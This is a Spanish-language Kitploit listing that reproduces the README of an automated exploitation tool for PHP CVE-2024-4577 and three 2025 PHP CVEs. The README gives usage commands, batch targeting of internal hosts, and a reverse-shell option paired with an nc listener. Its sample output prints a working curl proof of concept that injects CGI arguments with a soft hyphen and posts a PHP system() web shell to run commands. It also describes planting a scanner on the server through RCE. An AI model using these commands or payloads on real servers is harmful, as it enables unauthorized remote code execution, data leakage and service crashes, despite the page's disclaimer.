Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconocimientoEscáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlCrawlerHerramienta de Acceso Remoto
GitHubgl1tch0x1/php_8.1.x_exploit
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

PHP_8.1.x_Exploit

Detección y explotación automatizadas de vulnerabilidades críticas de PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Ver Repositorio
Compartir

🚀 PHP CVE Autopilot

Detección y explotación automatizada de vulnerabilidades críticas de PHP (bypass CVE-2024-4577, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh es una herramienta de evaluación de seguridad de un solo archivo, sin configuración que descubre automáticamente endpoints PHP vulnerables y explota cuatro CVEs de alto impacto que afectan a versiones de PHP anteriores a 8.1.34 (publicada en diciembre de 2024). No requiere ningún crafting manual de payloads – solo proporciona una URL y el script hace el resto, desde el rastreo hasta la ejecución remota de código. Completamente autopiloto – detecta y explota automáticamente sin intervención del usuario.

Características

  • Autopiloto completamente autónomo – dada una sola URL, rastrea, toma huellas, prueba y explota sin interacción del usuario.
  • Escaneo por lotes – introduce una lista de objetivos y ejecuta en paralelo.
  • Rastreo avanzado – extrae enlaces y formularios de la página de inicio para una mejor detección.
  • Huella digital del SO y versión de PHP – evita ataques solo para Windows en Linux, verifica la versión de PHP.
  • Bypass CVE-2024-4577 (Inyección de argumentos CGI en Windows)
    • Detecta y explota endpoints PHP-CGI vulnerables.
    • Reverse shell opcional (PowerShell one‑liner).
    • Dos variantes de inyección: estándar -d y bypass con guion suave %AD.
  • CVE-2025-14177 – fuga de memoria heap mediante getimagesize()
    • Crea dinámicamente un JPEG malformado y lo envía automáticamente a cualquier endpoint de subida descubierto.
    • Detecta memoria filtrada en las respuestas.
  • Escaneo local profundo mediante RCE (cuando se explota CVE-2024-4577)
    • Sube un escáner PHP ligero que prueba:
      • CVE-2025-14180 – desreferencia de puntero NULL en PDO PostgreSQL.
      • CVE-2025-14178 – desbordamiento de entero en array_merge.
  • Rastreo inteligente – extrae enlaces y formularios para descubrir scripts CGI y páginas de subida.
  • Ejecución en paralelo – usa parallel si está disponible, sino funciona correctamente.
  • Modos verbose y debug – ve cada petición HTTP y cada decisión.
  • Generación de informes – guarda todos los hallazgos en un archivo de texto.
  • Limpio y seguro – los archivos temporales se destruyen al salir, los timeouts evitan bloqueos.

Requisitos

No se requieren privilegios de root – la herramienta solo envía peticiones HTTP y opcionalmente ejecuta un reverse shell (requiere un listener en tu máquina).

Instalación

root@kitploit:~
git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

Uso

Objetivo único (más común)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.example.com

Objetivo único con reverse shell (CVE-2024-4577)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

Luego en tu máquina:

root@kitploit:~
nc -lvnp 4444

Escaneo por lotes de múltiples objetivos

root@kitploit:~
./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

Ejemplo targets.txt:

root@kitploit:~
http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

Modo solo escaneo (sin intentos de explotación)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

Guardar informe en archivo

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

Salida verbose / debug

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # muy ruidoso

Cómo funciona (fases)

Opciones de línea de comandos (referencia completa)

CVEs cubiertos en detalle

Nota: CVE‑2025‑14180 y CVE‑2025‑14178 solo pueden detectarse con precisión desde dentro del servidor (pruebas locales). El script logra esto subiendo un escáner después de un exploit CGI exitoso.

📸 Ejemplo de salida

root@kitploit:~
[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ Advertencias importantes y descargo de responsabilidad

  • Modo autopiloto – La herramienta explota vulnerabilidades automáticamente sin avisos. Úsela solo en objetivos autorizados.
  • Solo para uso legal – Esta herramienta está diseñada para evaluaciones de seguridad autorizadas, pruebas de penetración y fines educativos. Usarla contra sistemas sin permiso es ilegal en la mayoría de las jurisdicciones.
  • Sin garantía – El software se proporciona "TAL CUAL" sin garantías de ningún tipo.
  • Posibilidad de daños – Los exploits pueden bloquear servicios (CVE-2025-14180) o corromper memoria (CVE-2025-14178). No ejecutar en sistemas de producción sin consentimiento explícito.
  • Reverse shell – La opción --revshell abre un socket desde el objetivo hacia tu máquina. Asegúrate de tener el derecho de conexión de retorno.
  • Registro – Tus peticiones aparecerán en los logs de acceso/error del objetivo. Úsalo responsablemente.

🛠️ Solución de problemas

🤝 Contribuciones

Las solicitudes de incorporación de cambios, informes de errores y sugerencias de funciones son bienvenidas. Por favor, sigue:

  • Mantén el script de un solo archivo y en Bash puro.
  • Prueba con parallel y sin él.
  • Actualiza este README en consecuencia.

📜 Licencia

GNU General Public License v3.0 – consulta el archivo LICENSE.

📚 Referencias

  • Anuncio de la versión PHP 8.1.34
  • Detalle de CVE-2024-4577 (NVD)
  • CVE-2025-14177 / 14178 / 14180 (NVD)
  • Mapeo de caracteres Best-Fit de Windows

Hecho con 🧠 para la comunidad de seguridad. Úsalo éticamente.

Descargar herramienta
PHP_8.1.x_Exploit — Detección y explotación automatizadas de vulnerabilidades críticas de PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
DependenciaPropósito¿Normalmente instalado?
bash 4.0+Intérprete de scriptsSí (Linux/macOS)
curlPeticiones HTTPSí
grep, sed, awkProcesamiento de textoSí
mktempCreación de archivos temporalesSí
(opcional) parallelEscaneo por lotes más rápidoNo (pero recomendado)
(opcional) jqFormateo de salida JSONNo
FaseAcción
1Huella digital – SO y versión de PHP a partir de cabeceras y sondeos.
2Rastreo – extrae atributos href y action de la página de inicio.
3Descubrimiento de CGI – prueba rutas comunes y enlaces rastreados que parecen CGI.
4Prueba de CVE‑2024‑4577 – inyecta payloads -d y %AD; si tiene éxito, ejecuta comandos o envía reverse shell.
5Descubrimiento de endpoints de subida – verifica rutas de subida comunes y formularios que contengan "upload"/"image".
6Prueba de CVE‑2025‑14177 – crea un JPEG malformado, lo envía por POST a cada endpoint de subida, detecta fugas de heap.
7Escaneo interno profundo – si se logra RCE, sube un script PHP escáner y lo ejecuta para probar CVE‑2025‑14180 / CVE‑2025‑14178.
8Informe – imprime un resumen y opcionalmente escribe en un archivo.
OpciónDescripción
-u URLURL de un solo objetivo (ej. http://example.com/)
-l FILEArchivo por lotes con una URL por línea
--scan-onlySolo detectar – no explotar (sin reverse shell, sin subidas de payload)
-o FILEEscribir informe final en FILE
--threads NNúmero de hilos paralelos para escaneo por lotes (predeterminado: 5)
--timeout NTiempo de espera HTTP en segundos (predeterminado: 10)
--no-colorDeshabilitar salida coloreada
--verboseMostrar progreso detallado
--debugMostrar cada petición HTTP (puede exponer datos sensibles)
--revshell IP PORTIntentar reverse shell cuando se encuentre CVE‑2024‑4577
-h, --helpMostrar ayuda y salir
CVEGravedadImpactoVector de explotaciónCorregido en
CVE‑2024‑4577 (bypass)CríticoRCEInyección de argumentos CGI en Windows (mapeo de guion suave)PHP 8.1.34
CVE‑2025‑14177Media/AltaFuga de información (memoria heap)JPEG malformado pasado a getimagesize()PHP 8.1.34
CVE‑2025‑14180AltaDoS (desreferencia NULL)PDO PostgreSQL con prepares emulados + parámetro malformado \x99PHP 8.1.34
CVE‑2025‑14178Alta (8.2)DoS / posible corrupción de memoriaarray_merge() con arrays enormes causando desbordamiento de enteroPHP 8.1.34
ProblemaSolución
curl: command not foundInstala curl
GNU parallel not foundIgnorado – el script funciona sin él (escaneos por lotes más lentos)
No se encuentran endpoints CGIEl objetivo puede no usar CGI, o está detrás de un WAF que bloquea las banderas -d
CVE-2024-4577 funciona pero el reverse shell fallaVerifica el firewall; prueba con un payload más simple usando --scan-only y un listener manual nc
La prueba de fuga de imagen siempre devuelve "No leak"El endpoint de subida puede no usar getimagesize(), o limpia datos binarios
La subida del escáner local fallaPuede que la raíz web no tenga permisos de escritura; el script intenta escribir en el mismo directorio que el script CGI